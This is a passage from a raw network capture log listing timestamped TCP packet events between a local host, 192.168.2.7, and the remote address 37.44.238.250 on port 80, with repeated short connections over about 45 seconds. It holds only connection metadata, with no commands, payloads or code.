                                        Nov 5, 2024 08:13:49.325725079 CET5007580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.326008081 CET805007637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:49.326045990 CET5007680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.326236010 CET805007537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:49.326273918 CET5007580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.442059994 CET5007580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.442183971 CET5007680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.442825079 CET5007780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.447305918 CET805007537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:49.447372913 CET5007580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.447616100 CET805007737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:49.447690010 CET5007780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.447720051 CET805007637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:49.447761059 CET5007680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.447833061 CET5007780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.452630997 CET805007737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:49.802268982 CET5007780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:49.807219028 CET805007737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:50.272866011 CET805007737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:50.319232941 CET5007780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:50.358350039 CET805007737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:50.358752966 CET5007780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:50.364048958 CET805007737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:50.366436005 CET5007780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:50.488383055 CET5007880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:50.493335009 CET805007837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:50.493452072 CET5007880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:50.493639946 CET5007880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:50.498514891 CET805007837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:50.850342989 CET5007880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:50.855181932 CET805007837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:51.316674948 CET805007837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:51.364614964 CET5007880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:51.392174006 CET805007837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:51.442749977 CET5007880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:51.521794081 CET5007880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:51.522735119 CET5007980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:51.527931929 CET805007837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:51.527981997 CET5007880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:51.528003931 CET805007937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:51.528064966 CET5007980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:51.528162003 CET5007980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:51.533143044 CET805007937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:51.880351067 CET5007980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:51.885324001 CET805007937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:52.347029924 CET805007937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:52.395890951 CET5007980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:52.428056955 CET805007937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:52.474011898 CET5007980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:52.548805952 CET5007980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:52.549679041 CET5008080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:52.554045916 CET805007937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:52.554316998 CET5007980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:52.554523945 CET805008037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:52.554714918 CET5008080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:52.554878950 CET5008080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:52.559951067 CET805008037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:52.912395954 CET5008080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:52.917304039 CET805008037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:53.397147894 CET805008037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:53.442738056 CET5008080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:53.473309994 CET805008037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:53.520874023 CET5008080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:53.597642899 CET5008080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:53.598392010 CET5008180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:53.602993011 CET805008037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:53.603053093 CET5008080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:53.603471994 CET805008137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:53.603530884 CET5008180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:53.603728056 CET5008180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:53.609101057 CET805008137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:53.958729029 CET5008180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:53.963844061 CET805008137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:54.334608078 CET5008180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:54.334610939 CET5008280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:54.339628935 CET805008237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:54.340430975 CET805008137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:54.340532064 CET5008180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:54.340538979 CET5008280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:54.340676069 CET5008280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:54.346750975 CET805008237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:54.455332041 CET5008380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:54.469796896 CET805008337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:54.470186949 CET5008380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:54.474334955 CET5008380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:54.479266882 CET805008337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:54.698344946 CET5008280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:54.703416109 CET805008237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:54.703763962 CET805008237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:54.817847967 CET5008380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:54.822741985 CET805008337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:55.169569969 CET805008237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:55.225336075 CET5008280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.242516041 CET805008237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:55.285463095 CET805008337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:55.286473989 CET5008280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.333345890 CET5008380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.355393887 CET805008337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:55.395843983 CET5008380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.477662086 CET5008280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.477757931 CET5008380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.478547096 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.483155012 CET805008237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:55.483207941 CET5008280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.483356953 CET805008337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:55.483433008 CET5008380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.483468056 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:55.483527899 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.483747959 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.488771915 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:55.833560944 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:55.838496923 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:56.301719904 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:56.349071026 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:56.386116028 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:56.427113056 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:56.502300978 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:56.502305984 CET5008580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:56.802334070 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:57.411459923 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:57.450011969 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:57.450062990 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:57.450069904 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:57.450104952 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:57.450334072 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:57.450373888 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:57.451663017 CET805008537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:57.451673031 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:57.451680899 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:57.451747894 CET5008580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:57.451780081 CET805008437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:57.451822996 CET5008480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:57.451988935 CET5008580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:57.457159996 CET805008537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:57.802262068 CET5008580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:57.807209969 CET805008537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:58.273480892 CET805008537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:58.318310022 CET5008580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:58.354895115 CET805008537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:58.411472082 CET5008580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:58.469753981 CET5008580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:58.469758034 CET5008680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:58.474673986 CET805008637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:58.474770069 CET5008680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:58.474900007 CET5008680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:58.475800991 CET805008537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:58.475900888 CET5008580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:58.479715109 CET805008637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:58.834311962 CET5008680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:58.839179993 CET805008637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:59.287149906 CET805008637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:59.333340883 CET5008680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:59.368043900 CET805008637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:59.411494017 CET5008680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:59.691725016 CET5008680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:59.697155952 CET805008637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:59.697216988 CET5008680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:59.703818083 CET5008780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:59.708817005 CET805008737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:13:59.708878994 CET5008780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:59.741625071 CET5008780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:13:59.746573925 CET805008737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:00.099188089 CET5008780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.104167938 CET805008737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:00.256052971 CET5008780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.256623983 CET5008880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.261643887 CET805008837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:00.261760950 CET5008880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.261816978 CET5008880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.267258883 CET805008837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:00.293926954 CET805008737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:00.294090986 CET5008780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.378493071 CET5008980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.383488894 CET805008937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:00.384392023 CET5008980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.384543896 CET5008980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.389754057 CET805008937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:00.614716053 CET5008880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.619607925 CET805008837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:00.619698048 CET805008837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:00.740317106 CET5008980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:00.745712042 CET805008937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:01.072973967 CET805008837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:01.118314981 CET5008880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.146430969 CET805008837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:01.192775965 CET5008880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.219640017 CET805008937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:01.270833015 CET5008980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.304662943 CET805008937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:01.348965883 CET5008980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.423535109 CET5008880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.423837900 CET5008980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.424417019 CET5009080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.429828882 CET805008837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:01.429896116 CET5008880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.429987907 CET805009037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:01.430046082 CET5009080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.430138111 CET5009080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.430140018 CET805008937.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:01.430210114 CET5008980192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.436232090 CET805009037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:01.790092945 CET5009080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:01.795063019 CET805009037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:02.245803118 CET805009037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:02.302117109 CET5009080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:02.331181049 CET805009037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:02.439812899 CET5009080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:02.458019018 CET5009180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:02.462898970 CET805009137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:02.462992907 CET5009180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:02.463392973 CET5009180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:02.468527079 CET805009137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:02.818649054 CET5009180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:02.823620081 CET805009137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:03.281985044 CET805009137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:03.368546963 CET805009137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:03.368619919 CET5009180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:03.499550104 CET5009180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:03.501621008 CET5009280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:03.505125046 CET805009137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:03.505245924 CET5009180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:03.506548882 CET805009237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:03.506616116 CET5009280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:03.507064104 CET5009280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:03.511885881 CET805009237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:03.865230083 CET5009280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:03.870275021 CET805009237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:04.965688944 CET805009237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:04.965708971 CET805009237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:04.965718985 CET805009237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:04.965725899 CET805009237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:04.965816021 CET5009280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:04.965816021 CET5009280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:05.104553938 CET5003580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:05.104554892 CET5004280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:05.104692936 CET5009080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:05.109209061 CET5009280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:05.110054970 CET5009380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:05.114442110 CET805009237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:05.114892960 CET805009337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:05.115000963 CET5009280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:05.115003109 CET5009380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:05.115104914 CET5009380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:05.119992971 CET805009337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:05.474097967 CET5009380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:05.479126930 CET805009337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:05.918174028 CET805009337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:05.999053001 CET805009337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:06.000346899 CET5009380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:06.128442049 CET5009380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:06.129067898 CET5009480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:06.133805037 CET805009337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:06.133873940 CET5009380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:06.133883953 CET805009437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:27.130146027 CET5012080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:27.170645952 CET805012037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:27.226147890 CET5012080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:27.301181078 CET5012080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:27.301182032 CET5012180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:27.306183100 CET805012137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:27.306665897 CET805012037.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:27.306768894 CET5012080192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:27.306809902 CET5012180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:27.306910038 CET5012180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:27.311825991 CET805012137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:27.661582947 CET5012180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:27.666620970 CET805012137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:28.118144989 CET805012137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:28.161398888 CET5012180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:28.190395117 CET805012137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:28.239497900 CET5012180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:28.326152086 CET5012280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:28.326157093 CET5012180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:28.331135988 CET805012237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:28.331454039 CET805012137.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:28.332434893 CET5012280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:28.332456112 CET5012180192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:28.338150024 CET5012280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:28.342973948 CET805012237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:28.677166939 CET5012280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:28.812722921 CET805012237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.176127911 CET805012237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.226136923 CET5012280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.259664059 CET805012237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.322170973 CET5012280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.380162954 CET5012280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.381148100 CET5012380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.387278080 CET805012237.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.387334108 CET5012280192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.387399912 CET805012337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.387476921 CET5012380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.387624025 CET5012380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.394534111 CET805012337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.741244078 CET5012380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.746220112 CET805012337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.815071106 CET5012480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.815579891 CET5012380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.819957018 CET805012437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.820024967 CET5012480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.820208073 CET5012480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:29.825190067 CET805012437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.866059065 CET805012337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.972063065 CET805012337.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:29.972145081 CET5012380192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:30.127101898 CET5012580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:30.133063078 CET805012537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:30.133124113 CET5012580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:30.133335114 CET5012580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:30.139364004 CET805012537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:30.177411079 CET5012480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:30.182537079 CET805012437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:30.182548046 CET805012437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:30.490025997 CET5012580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:30.495089054 CET805012537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:30.622296095 CET805012437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:30.677011013 CET5012480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:30.709126949 CET805012437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:30.755124092 CET5012480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:30.944322109 CET805012537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:30.992511988 CET5012580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:31.017329931 CET805012537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:31.068532944 CET5012580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:31.141609907 CET5012480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:31.141611099 CET5012580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:31.144154072 CET5012680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:31.147070885 CET805012537.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:31.147273064 CET5012580192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:31.147473097 CET805012437.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:31.147524118 CET5012480192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:31.149827003 CET805012637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:31.149923086 CET5012680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:31.150080919 CET5012680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:31.155215979 CET805012637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:31.505248070 CET5012680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:31.510221958 CET805012637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:31.965753078 CET805012637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:32.015892029 CET5012680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:32.042373896 CET805012637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:32.042661905 CET5012680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:32.047710896 CET805012637.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:32.047763109 CET5012680192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:32.159626961 CET5012780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:32.164544106 CET805012737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:32.164643049 CET5012780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:32.164813995 CET5012780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:32.169603109 CET805012737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:32.522145033 CET5012780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:32.527230978 CET805012737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:32.984762907 CET805012737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:33.061784029 CET805012737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:33.066452980 CET5012780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:33.190121889 CET5012780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:33.192727089 CET5012880192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:33.195245981 CET805012737.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:33.196171045 CET5012780192.168.2.737.44.238.250
                                        Nov 5, 2024 08:14:33.197597980 CET805012837.44.238.250192.168.2.7
                                        Nov 5, 2024 08:14:33.197822094 CET5012880192.168.2.737.44.238.250
